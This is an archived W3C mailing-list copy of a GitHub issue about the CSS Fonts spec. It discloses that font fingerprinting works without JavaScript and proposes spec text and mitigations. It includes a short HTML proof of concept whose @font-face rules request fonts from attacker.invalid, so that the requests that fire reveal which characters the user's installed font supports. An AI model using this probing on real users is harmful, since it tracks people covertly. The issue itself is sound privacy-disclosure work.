[csswg-drafts] [css-fonts] JS-free probing of Unicode support of fonts (#5578) from quasicomputational via GitHub on 2020-10-04 (public-css-archive@w3.org from October 2020)

From: quasicomputational via GitHub <sysbot+gh@w3.org>
Date: Sun, 04 Oct 2020 08:58:32 +0000
To: public-css-archive@w3.org
Message-ID: <issues.opened-714268696-1601801910-sysbot+gh@w3.org>

quasicomputational has just created a new issue for https://github.com/w3c/csswg-drafts:

== [css-fonts] JS-free probing of Unicode support of fonts ==
The spec currently says this about fingerprinting (https://drafts.csswg.org/css-fonts/#sp201):

> An attacker may obtain fingerprinting information by querying the Installed Fonts. In contrast to older technologies (notably Adobe Flash, which provided a complete list of Installed Fonts and sent this information in HTTP headers) such probing must be done one font at a time, providing the font family name and then checking via script whether the font was loaded. This takes time, and checking for more than a few hundred fonts introduces a noticeable delay in page rendering.

This is, however, not accurate: an attacker can conduct a certain amount of probing without JS, only using CSS, by selectively downloading webfonts depending on whether the user has a font by a certain name that supports a certain character. An example speaks a thousand words (or, in this case, two):

```html
<!DOCTYPE html>
<meta charset=utf-8>
<style>
  @font-face {
    font-family: NonExistentGrek;
    src: url(https://attacker.invalid/grek);
    unicode-range: U+0370-03FF;
  }
  @font-face {
    font-family: NonExistentHebr;
    src: url(https://attacker.invalid/hebr);
    unicode-range: U+0590-05FF;
  }
  :root {
    font-family: monospace, NonExistentGrek, NonExistentHebr;
  }
</style>
χαίρετε! שלום!
```

Opening up devtools and loading that HTML, depending on what your monospace font is, you may see zero, one, or two failed font requests. This can be used to discover precisely which characters a font supports, if it's installed, which is quite likely to be unique amongst fonts.

If scripting is available, this attack is (mostly) inferior to actively probing with JS (there's some residual advantage to checking in parallel and having the browser do the work for you, but that's not really made up for by the loss in resolution or complexity, I wouldn't think).

However, in privacy-sensitive contexts, scripting is likely not available because of the hundreds of other scary things it can do, and this may be a genuinely concerning information leak.

At the same time, this pattern is useful for only incurring the cost of a font download when it's needed to support some characters. Leaking font information trades off very harshly against efficiency - basically, the same trade-off that UAs already face when considering requests that are conditional on media queries (#3488).

The spec already has text talking about privacy budgets and UAs minimising font variance to reduce fingerprintability, which applies fine to this attack as well. I think that there are two changes I would like to see:
* First, to § 12.1 'What information might this feature expose...', mentioning that JS is not required for probing, so that this sort of thing is on UAs' radar for reducing fingerprintability.
* Second, writing down another potential mitigation, which is to download all of the `@font-face` rules regardless of whether they're actually needed or not.

This is related to the broader issue font fingerprinting vectors (#4055), but I wanted to open a specific issue for this attack because the spec's text, as written, is wrong.

Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5578 using your GitHub account


-- 
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config

Received on Sunday, 4 October 2020 08:58:34 UTC